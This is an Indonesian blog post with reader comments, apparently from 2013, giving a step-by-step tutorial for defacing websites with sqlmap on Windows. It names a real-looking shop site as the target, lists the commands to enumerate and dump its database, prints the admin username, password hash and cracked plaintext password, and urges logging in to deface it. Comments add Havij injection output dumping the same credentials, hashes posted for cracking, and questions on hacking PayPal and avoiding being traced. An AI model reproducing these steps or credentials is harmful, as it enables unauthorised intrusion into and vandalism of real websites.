Knowledge is Free | We Share To Everywhere

Wednesday, April 24, 2013

Deface Dengan SQLMAP di WINDOWS 7


Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

  • http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

2. Stelah itu, kalian mulailah scan website target dengan perintah :
  • sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]


3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :


4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
  • sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :


5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
  • sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
  • do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :




nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :


Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Sama kan kayak make BACKTRACK 5 :D

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404






68 comments:

  1. itu ngga ada hapus jejak segala ya?
    apakah bisa dilacak?

    ReplyDelete
    Replies
    1. alay lu.. emang kalo dilacak mau ngapain.. baca judulnya.. ini yg dibahas tentang sqlmap. bukan hapus jejak... !!!

      Delete
  2. Havij 1.15 Pro!
    Analyzing http://vana-shop.com/product.php?c=1
    Host IP: 119.82.227.67
    Web Server: Apache
    Keyword Found: sangat
    Injection type is Integer
    DB Server: MySQL >=5
    Selected Column Count is 13
    Valid String Column is 3
    Current DB: k4735093_vnsh099
    Count(table_name) of information_schema.tables where table_schema=0x6B343733353039335F766E7368303939 is 9
    Tables found: category,contact,discount,discountdetail,homepage,products,promo,subcategory,user
    Count(column_name) of information_schema.columns where table_schema=0x6B343733353039335F766E7368303939 and table_name=0x75736572 is 4
    Columns found: userID,username,password,userlevel
    Count(*) of k4735093_vnsh099.user is 1
    Data Found: username,password,userlevel=admin^c07d0e92b5e39f2747a897ea5ad8e6aa^Administrator

    kelamaan. :v
    pake havij udah selesai cuma 1menit. :v

    ReplyDelete
    Replies
    1. gak semua bisa di tusbol make Havij :P

      Delete
    2. Havij 1.15 Pro!
      Analyzing http://vana-shop.com/product.php?c=1
      Host IP: 185.53.177.11
      Web Server: nginx
      Keyword Found: uiOptimize:
      Injection type is String (')
      Can't find db server type! But maybe there be some chances! [-o<
      Trying another method using keyword for finding columns count
      Selected Column Count is 3
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Cannot find string column!
      Testing for MySQL error based injection method
      MySQL error based injection method cant be used!
      Trying blind method
      Finding current data base
      It seems that target is not vulnerable. it's a false positive, Injection Failed!
      MsSQL time based injection method can't be used
      MySQL time based injection method can't be used

      [-(

      Delete
  3. ada yang nyolong kek. http://shad0w-share.blogspot.com/2013/04/deface-dengan-sqlmap-di-windows-7.html

    ReplyDelete
    Replies
    1. ini yg manual ^^
      ga semua bug injek" havij bisa nembus :D

      Delete
    2. Apa hubungan nya sama komen gue ?

      Delete
    3. siapa yang nyolong om ? artikelnya sama sama di buat di tanggal bulan dan tahun yang sama :-?

      Delete
  4. gan gimana cara cari web targetnya ?

    ReplyDelete
  5. c07d0e92b5e39f2747a897ea5ad8e6aa *Ups :-)

    ReplyDelete
  6. alah blog cacad ini mah..deface tingkat newbie aja sok sok an loh..

    ReplyDelete
  7. ni mah blog nya bocah smp yah qwkakakakakak..

    ReplyDelete
  8. itu juga yang namanya BIMO ama ONIX AQUA KENCING KUDA orang aneh semua awkawoawkoawkoawko

    ReplyDelete
    Replies
    1. kencing kuda itu yang beraninya make ANONIM ngak pake akun :P

      Delete
    2. Bayi :p udh netek dulu sana :D

      Delete
  9. phythonnya banyak versi ya? aku jadi bingung. kalo yang buat windows 7 32 bit pake yang mana?

    ReplyDelete
  10. knp CMD gua kgak bisa \cd\sqlmap\ ??

    ReplyDelete
    Replies
    1. baca dulu om ...
      cmd om da d directori mna ...

      Delete
    2. buka 1 1 aja dulu bro :D

      cd \

      Delete
  11. sdkit koreksi om
    postingannya da slah ktik dkit d bgian lngkah k 3

    3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

    sqlmap.py -u http://TARGET.com -D nama_database -tables

    sharusnya kn

    sqlmap.py -u http://TARGET.com -D nama_database --tables


    dkit aja ...
    tp kseluruhan isi postingannya top bnget ...

    ReplyDelete
    Replies
    1. hehe kurang - satu :D

      maaf om :D

      makasih ^_^

      Delete

  12. ☺ Python [tonjok saya]
    ☺ Sqlmap [remas saya]
    aduh bang jangan remas - remas , msh pejaka bang .

    ./virus47

    ReplyDelete
  13. Bang python nyamembingungkan nih ?
    Yang mna yg hrus didownload untuk W7 32 bit ?

    ReplyDelete
  14. yng ngebingunin download python nya .. banyak versinya .. pilih yg mana jadinya ?? :3

    ReplyDelete
    Replies
    1. trserah ...
      kan sama aja ...
      cma beda versi doank ...

      Delete
  15. om.. kenapa setiap udah di enter ga keluar apa" dan malah python.exe stopped working.. pencerahan dong

    ReplyDelete
  16. itu extract sqlmap d C:pyhton ap d C: aja..trus kegunaan python ap kalo sqlmap ny d C: ?

    ReplyDelete
    Replies
    1. d C:\ aja,, gunanya python utk jalankn apliikasi yg dibuat dari bhsa python,, bysa berextensi .py

      cth: sqlmap.py

      Delete
  17. gan kenapa pas ane buka cmd trus ketik cd\sqlmap\ ada tulisan The System Cannot Find The Patch Specified tolong kak bimo [-(

    ReplyDelete
  18. kok keluar gini y gan

    File "sqlmap\sqlmap.py\", line 92
    except exceptiontuple, e:

    syntac error


    mohon bimbingannya

    ReplyDelete
  19. wkwkwkw berhasil gan wkwkwkw
    go hacking ;(( ;-( =p~ :d

    ReplyDelete
  20. gan, sqlmap nya ngak bisa di extrack di drive c; ,malah error ??? #dimasukin dimananya Sqlmap nya ??

    ReplyDelete
    Replies
    1. Sqlmap nya di extrack di driver c: di Luarnya gan

      Delete
  21. acem dah kok malah syntaxt error

    ReplyDelete
  22. IP kita kebaca tidak kira2 gan?

    ReplyDelete
  23. wkwkwkwkwkw ....
    bukan bermaksud mennyinggung pembuat tread
    hanya lebih kepada para peng coment

    dari atas ampe bawah itu2 saja yang ditanya
    mbok ya dibiasakan budaya membaca sampai selesai dulu
    trus coba deh, kalo gagal dan udah mentok juga g ada di tutor ataupun di begian koment
    baru dah sisipin pertanyaan lu =))

    sorry ya min, miris aja liat budaya bertanya tanpa membaca keseluruhan (/\)

    ReplyDelete
  24. kenapa kok pas ngejalani langkah pertama ada tulisannya [EROR] all parameter is not injectable
    pada akhir .. !! kalo gg salah gtu tulisannya dan intinya saya tidak berhasil?
    dan hasilnya ane tidak dapet info database dari web @-)

    ReplyDelete
  25. om klo pass nya kayak gini gimana decrypt nya, :-?
    $P$Bwqd3pFzDcPe4krOUm0lP7C82RTU2C0

    mohon om pencerahan nya ;((

    ReplyDelete
  26. kalo ane pratiin cara kerja Havij sama sqlmap hampir sama ...
    ini ngarti ini waktu masih asik"nye maen backtrack ...
    Kasus : Misal Web A terdetect vunl, kemudian di coba make havij kagak nembus, pake sqlmap bakal nembus kagak ya ....? mohoh penjelasannye singkat padat + tepat ye kang .. :)

    ReplyDelete
  27. ane udh instal bahan nya tp ko ga jalan ya,apakah hanya support buat sistem 32bit aja, ane pake yg 64bit soalnya, mohon pencerahan nya donk :))

    ReplyDelete
  28. bang minta tolong dong bang crack ini code ane bingung nih newbie :'(

    26282ffe7c7822ecc43f2e77949488d2:fJke4Nc1x6OMvhe29EE3Fvejq5MAUjuS

    ReplyDelete
  29. msihh bingung cara buat mencahin kodenya bang, butuh titik terang nih (p) =))

    ReplyDelete
  30. kagak bisa tembusss..... ;-(

    ReplyDelete
  31. bisa buat kalding donk berarti pak? :D
    Makacih Om (k)

    ReplyDelete
  32. gan mau nanya, ane td ternyata ada salah nge scan salah satu table-_- nah untuk back gitu bisa gak biar ketampil lagi semua table nya? (seperti step 4)

    ReplyDelete
  33. Mantab om :) Dah Berhasil (y) Tapi Ngedump Nya kok lama ya :3 Apa emang gitu :3

    ReplyDelete
  34. masa ane buka cmd terus nulis code cd\sqlmap\ malah ada tulisan gini om the system cannot find the path specified itu kenapa ya om mohon bantuan nya , makasih

    ReplyDelete
  35. gan kalau mau hacking PAYPAL GMNA ? pkai sql map ?? ;(( ;-(

    ReplyDelete
  36. gan kenape ane pas sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs ane enter kok tulisannya gini
    sqlmap: error: missing a mandatory parameter <'-d', '-u', '-l' blablabla, '--wizard' or '--update'>, -h for help
    press enter to continue
    ane enter tp malah berhenti, hmna gan help

    ReplyDelete
  37. banyak cara lg gan, pinter pinter kita aja ngembanginnya,

    ReplyDelete
  38. sukses gan, banyak cara lg gan, pinter2 kita aja ngembanginnya

    ReplyDelete
  39. Bang cara tahu url loginnya gimana ??? :-b

    ReplyDelete

Note: Only a member of this blog may post a comment.